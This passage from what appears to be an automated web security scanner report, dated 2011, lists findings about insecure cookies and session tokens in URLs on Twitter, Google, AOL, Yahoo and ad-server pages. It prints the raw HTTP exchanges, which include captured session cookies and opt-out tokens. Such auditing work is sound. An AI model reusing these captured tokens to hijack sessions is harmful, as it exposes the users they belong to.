Set-Cookie: _twitter_sess=BAh7CzoMY3NyZl9pZCIlYjZkY2M5NzIzY2Y2MDkzNGExMDQyMGU1Y2IzMDk4%250AYTk6DnJldHVybl90byIdaHR0cHM6Ly90d2l0dGVyLmNvbS9ob21lOhVpbl9u%250AZXdfdXNlcl9mbG93MDoPY3JlYXRlZF9hdGwrCJ5MXDIyASIKZmxhc2hJQzon%250AQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7%250AADoHaWQiJTg4NjQwZTVmNWYzYTk4ODk4NWJjOTU0ZmI4YzlmNmU5--787a4de76984eb9be102d7b7a1c076115411b8e1; domain=.twitter.com; path=/; HttpOnly
Expires: Sun, 04 Sep 2011 04:26:56 GMT
X-XSS-Protection: 1; mode=block
Vary: Accept-Encoding
Connection: close

<html><body>You are being <a href="https://twitter.com/login?redirect_after_login=%2Fhome">redirected</a>.</body></html>

11.2. https://adwords.google.com/um/StartNewLogin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://adwords.google.com
Path:   /um/StartNewLogin

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /um/StartNewLogin HTTP/1.1
Host: adwords.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Set-Cookie: SAG=EXPIRED;Path=/;Expires=Mon, 01-Jan-1990 00:00:00 GMT
Set-Cookie: S=photos_html=FTyqjPT95zxOfh08A6sicw:adwords-usermgmt=nxJ1qeE2dub0qBBtppwupA; Domain=.google.com; Path=/; Secure; HttpOnly
Location: https://www.google.com/accounts/ServiceLogin?service=adwords&hl=en&ltmpl=adwords&passive=true&ifr=false&alwf=true&continue=https://adwords.google.com/um/gaiaauth?apt%3DNone
X-Invoke-Duration: 11
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 04:12:04 GMT
Expires: Sun, 04 Sep 2011 04:12:04 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="https://www.google.com/accounts/ServiceLogin?s
...[SNIP]...

12. Session token in URL  previous  next
There are 24 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


12.1. http://advertising.aol.com/nai/nai.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://advertising.aol.com
Path:   /nai/nai.php

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /nai/nai.php?action_id=4 HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: token_nai_advertising_com=1170877546; token_nai_adsonar_com=1462706141; token_nai_tacoda_at_atwola_com=2011729621; token_nai_adtech_de=1144859041; token_nai_ad_us-ec_adtechus_com=1214941173; token_nai_adserver_adtechus_com=2011695027; token_nai_adserverec_adtechus_com=737485457; token_nai_adserverwc_adtechus_com=585611182; token_nai_glb_adtechus_com=592246145

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:13:17 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Expires: Sun, 04 Sep 2011 11:13:18 GMT
Content-Type: text/html
Content-Length: 13647


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script>

   // dynamic variables
   var numFrames = 9;
   var redirectUrlNoCookie = "http://www.networkadvertising.org/verify/no_cookie.gif";
   var redire
...[SNIP]...
<body onload='optOut();' >
<iframe id='frame_0' src='http://nai.advertising.com/nai/daa.php?action_id=4&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3978572&token=1170877546' height='1' width='1'></iframe>
<br />
<iframe id='frame_1' src='http://nai.adsonar.com/nai/daa.php?action_id=4&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3978572&token=1462706141' height='1' width='1'></iframe>
<br />
<iframe id='frame_2' src='http://nai.tacoda.at.atwola.com/nai/daa.php?action_id=4&participant_id=2&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3978572&token=2011729621' height='1' width='1'></iframe>
<br />
<iframe id='frame_3' src='http://nai.adtech.de/nai/daa.php?action_id=4&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3978572&token=1144859041' height='1' width='1'></iframe>
<br />
<iframe id='frame_4' src='http://nai.ad.us-ec.adtechus.com/nai/daa.php?action_id=4&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3978572&token=1214941173' height='1' width='1'></iframe>
<br />
<iframe id='frame_5' src='http://nai.adserver.adtechus.com/nai/daa.php?action_id=4&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3978572&token=2011695027' height='1' width='1'></iframe>
<br />
<iframe id='frame_6' src='http://nai.adserverec.adtechus.com/nai/daa.php?action_id=4&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3978572&token=737485457' height='1' width='1'></iframe>
<br />
<iframe id='frame_7' src='http://nai.adserverwc.adtechus.com/nai/daa.php?action_id=4&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3978572&token=585611182' height='1' width='1'></iframe>
<br />
<iframe id='frame_8' src='http://nai.glb.adtechus.com/nai/daa.php?action_id=4&participant_id=8&rd=http%3A%2F%2Fadvertising.aol.com&nocache=3978572&token=592246145' height='1' width='1'></iframe>
...[SNIP]...

12.2. http://blogs.timesofindia.indiatimes.com/main/page/relatedPostFeed  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://blogs.timesofindia.indiatimes.com
Path:   /main/page/relatedPostFeed

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /main/page/relatedPostFeed HTTP/1.1
Host: blogs.timesofindia.indiatimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache-Coyote/1.1
Content-Type: text/html
Date: Sun, 04 Sep 2011 04:13:15 GMT
Content-Length: 1477
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<tit
...[SNIP]...
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

<link rel="stylesheet" type="text/css" media="all" href='/roller-ui/styles/roller.css;jsessionid=9D9B14F9CA1334191A76233220F54901.worker1' />
</head>
...[SNIP]...

12.3. http://info.yahoo.com/nai/nai-status.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://info.yahoo.com
Path:   /nai/nai-status.html

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /nai/nai-status.html?nocache=0.8411065 HTTP/1.1
Host: info.yahoo.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii

Response

HTTP/1.1 999 Unable to process request at this time -- error 999
Date: Sun, 04 Sep 2011 11:39:37 GMT
Expires: Thu, 01 Jan 1970 22:00:00 GMT
Cache-Control: no-cache, private
Cache-Control: no-store
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 5244

<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8" >

<!-- Title -->
<TITLE>
Yahoo! - 999 Unable to process request at this time -- error 999
</TITLE>
<!---------------->

...[SNIP]...
<!-- AltLogo -->
<img src=http://arc.help.yahoo.com/error.gif?r=1315136377&token=eHAFsCiDgDeS4mMaTaShxeZLJnoW8v8pynA8XVQS49COWrRRr1gmKKIGdTQrV5pbTyeMBdNoGR9vcJY.NHZjA5frGZKLoup23pODNxhJlH_UClEIo2UO9u7F3wRj0GnuUJ1FIDTWIBjdAAZ6dHQlPwOjRsO4kdWCrnvRVuGZ7k8mt5OmrI0FcOGBuuIKsTobOLJypZQVl_qcoP92jGjRbS1ON43t2jBewv2sR919zhPpqJixeUELxVUggWU3dJt6fzNpatFcb.Lv71HDcvLNaFxMFBglZsG5exZH0Z63TImaH4l32WLsmN34yT5_ffdXI.2C.seXWFCTEQPAmcpt7T6sfftKDIGBsx96Qp_5cs8UdLDZ2mAArME.PWcbzkHyhitSfj64QBBn9VF_nbCxuyu6oPpRbqKyiDfbAns.BMqCen.4IT7a8jIkQlhbds9yJGWRM6MDL7FoWl6Hw_tP24O_qeI5spZtlfGMFxW9P3VrPnypycKg2iASekw-&property=help.US&srv=info.yahoo.com alt="Yahoo!" width=42 height=41 border=0>
<!---------------->
...[SNIP]...
<!-- Temporary -->
While this error is usually temporary, if it continues and the above
solutions don't resolve your problem, please
<a href="http://arc.help.yahoo.com/arc/?token=eHAFsCiDgDeS4mMaTaShxeZLJnoW8v8pynA8XVQS49COWrRRr1gmKKIGdTQrV5pbTyeMBdNoGR9vcJY.NHZjA5frGZKLoup23pODNxhJlH_UClEIo2UO9u7F3wRj0GnuUJ1FIDTWIBjdAAZ6dHQlPwOjRsO4kdWCrnvRVuGZ7k8mt5OmrI0FcOGBuuIKsTobOLJypZQVl_qcoP92jGjRbS1ON43t2jBewv2sR919zhPpqJixeUELxVUggWU3dJt6fzNpatFcb.Lv71HDcvLNaFxMFBglZsG5exZH0Z63TImaH4l32WLsmN34yT5_ffdXI.2C.seXWFCTEQPAmcpt7T6sfftKDIGBsx96Qp_5cs8UdLDZ2mAArME.PWcbzkHyhitSfj64QBBn9VF_nbCxuyu6oPpRbqKyiDfbAns.BMqCen.4IT7a8jIkQlhbds9yJGWRM6MDL7FoWl6Hw_tP24O_qeI5spZtlfGMFxW9P3VrPnypycKg2iASekw-&.intl=us&property=help.US&srv=info.yahoo.com">let us know</a>
...[SNIP]...

12.4. http://info.yahoo.com/nai/optout.html  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://info.yahoo.com
Path:   /nai/optout.html

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/optout.html?token=QTNjYXUuZUVQOUE- HTTP/1.1
Host: info.yahoo.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: B=ei08qcd75vc4d&b=3&s=8s

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:15:24 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://www.networkadvertising.org/optout/opt_failure.gif
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Cache-Control: private
Content-Length: 81

<!-- w1.help.sp2.yahoo.com uncompressed/chunked Sun Sep 4 11:15:24 UTC 2011 -->

12.5. http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/gadgets/evthdlr  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/evthdlr

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /gadgets/evthdlr?t=err&gadget=http%3A%2F%2Fwww.google.com%2Ffriendconnect%2Fgadgets%2Fosapi-0.8.xml&container=peoplesense&jsurl=http%3A%2F%2Fwww.google.com%2Ffriendconnect%2Fscript%2Fgadget_util.js%3Fd%3D0.560.7&line=1&session=1315103840254&count=0&msg=Error%20loading%20script HTTP/1.1
Host: mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Referer: http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/osapi-0.8.xml&container=peoplesense&parent=http://social.ndtv.com/&mid=0&view=profile&d=0.560.7&lang=en&communityId=08392118198779617194&caller=http://social.ndtv.com/static/Comment/Form/?%26key%3Dae42a4f016dd1fdd208110a097b061a4%26link%3Dhttp%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252F48-hours-on-mumbai-airport-s-main-runway-still-shut-131142%26title%3D48%2Bhours%2Bon%252C%2BMumbai%2Bairport%2527s%2Bmain%2Brunway%2Bstill%2Bshut%26ctype%3Dstory%26identifier%3Dstory-131142

Response

HTTP/1.1 204 No Content
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache, no-store, must-revalidate
Expires: 0
Server: GSE
Date: Sun, 04 Sep 2011 04:02:37 GMT


12.6. http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/ps/ifr  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com
Path:   /ps/ifr

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /ps/ifr?container=friendconnect&mid=0&nocache=0&view=profile&parent=http%3A%2F%2Fsocial.ndtv.com%2F&url=http%3A%2F%2Fwww.google.com%2Ffriendconnect%2Fgadgets%2Fosapi-0.8.xml&communityId=08392118198779617194&caller=http%3A%2F%2Fsocial.ndtv.com%2Fstatic%2FComment%2FForm%2F%3F%26key%3Dae42a4f016dd1fdd208110a097b061a4%26link%3Dhttp%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917%26title%3DTurkish%2BAir%2Bplane%2Bskids%2Boff%2Btaxiway%2Bat%2BMumbai%2Bairport%26ctype%3Dstory%26identifier%3Dstory-130917&rpctoken=692437165 HTTP/1.1
Host: mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Location: http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-opensocial.googleusercontent.com/gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/osapi-0.8.xml&container=peoplesense&parent=http://social.ndtv.com/&mid=0&view=profile&d=0.560.7&lang=en&communityId=08392118198779617194&caller=http://social.ndtv.com/static/Comment/Form/?%26key%3Dae42a4f016dd1fdd208110a097b061a4%26link%3Dhttp%253A%252F%252Fwww.ndtv.com%252Farticle%252Findia%252Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917%26title%3DTurkish%2BAir%2Bplane%2Bskids%2Boff%2Btaxiway%2Bat%2BMumbai%2Bairport%26ctype%3Dstory%26identifier%3Dstory-130917#st=e%3DAOG8GaAcZ%252BatS6ThkqkB%252B7K%252BIt4E75U7dX%252FZMzM04E%252BtYWSPNXGsjldQbZI1UDC4hW5fqiHT9QOsH1dO3QLoU%252Bhu0N8XPZxK62nNiBjz4FSDCuE7KLLLkAnhbOpNGqbgz9JWjrby64PKL%252BDx38x%252Bstw%252BLb8SUFtVw7lk4Cu7KQRabxMImdzg1YoUWQEIOppadIrydYhcAjGcjutmb7YBFhc5ZC2tCs1jp%252FlWi0fW7Vvdy%252BYmzfRhEL8qukNgnXki%252F1Z7FYZDqv3Lfb2iBYQw5HFyxtzHjdcWT2wfuJjJaKbA9D0AbMYyJoNjILn0ISzvrGJ4RAVpXHbKuF%252FVhE3wvlu2RUIyFeW37XDPIfe2WPbi5CZConyMFTN9SJrCjmt4tCk1XL9e25WghiZdKvp%252BnXiOTk%252FCaep4LeTjALNxxvUtkpxEl9rS6iT9fxxVYowP3If04YD6wIEX3%252BZftEMcV2Vqno%252Fh8RVdh%252FSyJQQrNbPNpu4uVjPlpMHYsZV4lDYMkj1kXN5MI7%252FrRw44oWtiumaghMxkUIXN1r05tJp6Ep%252FtUJ9iA060%252Bb98NoXxhNHZJknUY7Z%252FjCd6%26c%3Dpeoplesense&rpctoken=692437165&
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 02:28:22 GMT
Expires: Sun, 04 Sep 2011 02:28:22 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Content-Length: 1563
Server: GSE

<HTML>
<HEAD>
<TITLE>Moved Temporarily</TITLE>
</HEAD>
<BODY BGCOLOR="#FFFFFF" TEXT="#000000">
<H1>Moved Temporarily</H1>
The document has moved <A HREF="http://mc8tdi0ripmbpds25eboaupdulritrp6-a-fc-o
...[SNIP]...

12.7. http://nai.ad.us-ec.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.ad.us-ec.adtechus.com
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=4&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9291397&token=1214941173 HTTP/1.1
Host: nai.ad.us-ec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=1214941173

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:18:32 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: http://advertising.aol.com/finish/4/4/3/
Expires: Sun, 04 Sep 2011 11:18:33 GMT
Content-Length: 0
Content-Type: text/html


12.8. http://nai.adserver.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.adserver.adtechus.com
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=5&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9291397&token=2011695027 HTTP/1.1
Host: nai.adserver.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=2011695027; JEB2=4E5FAC086E651A4418BD90FFF001676A

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:17:53 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: http://advertising.aol.com/finish/5/4/3/
Expires: Sun, 04 Sep 2011 11:17:54 GMT
Content-Length: 0
Content-Type: text/html


12.9. http://nai.adserverec.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.adserverec.adtechus.com
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=6&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9291397&token=737485457 HTTP/1.1
Host: nai.adserverec.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=737485457

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:18:26 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: http://advertising.aol.com/finish/6/4/3/
Expires: Sun, 04 Sep 2011 11:18:27 GMT
Content-Length: 0
Content-Type: text/html


12.10. http://nai.adserverwc.adtechus.com/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.adserverwc.adtechus.com
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=7&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9291397&token=585611182 HTTP/1.1
Host: nai.adserverwc.adtechus.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=585611182

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:18:28 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: http://advertising.aol.com/finish/7/4/3/
Expires: Sun, 04 Sep 2011 11:18:29 GMT
Content-Length: 0
Content-Type: text/html


12.11. http://nai.adsonar.com/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.adsonar.com
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=1&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9291397&token=1462706141 HTTP/1.1
Host: nai.adsonar.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=1462706141

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:20:38 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: http://advertising.aol.com/finish/1/4/3/
Expires: Sun, 04 Sep 2011 11:20:39 GMT
Content-Length: 0
Content-Type: text/html


12.12. http://nai.adtech.de/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.adtech.de
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=3&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9291397&token=1144859041 HTTP/1.1
Host: nai.adtech.de
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OO_TOKEN=1144859041; JEB2=4E5FAC156E651A4418BD90FFF0106094

Response

HTTP/1.1 302 Found
Date: Sun, 04 Sep 2011 11:18:47 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: no-cache, max-age=1
Pragma: no-cache
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Location: http://advertising.aol.com/finish/3/4/3/
Expires: Sun, 04 Sep 2011 11:18:48 GMT
Content-Length: 0
Content-Type: text/html


12.13. http://nai.advertising.com/nai/daa.php  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://nai.advertising.com
Path:   /nai/daa.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /nai/daa.php?action_id=4&participant_id=0&rd=http%3A%2F%2Fadvertising.aol.com&nocache=9291397&token=1170877546 HTTP/1.1
Host: nai.advertising.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
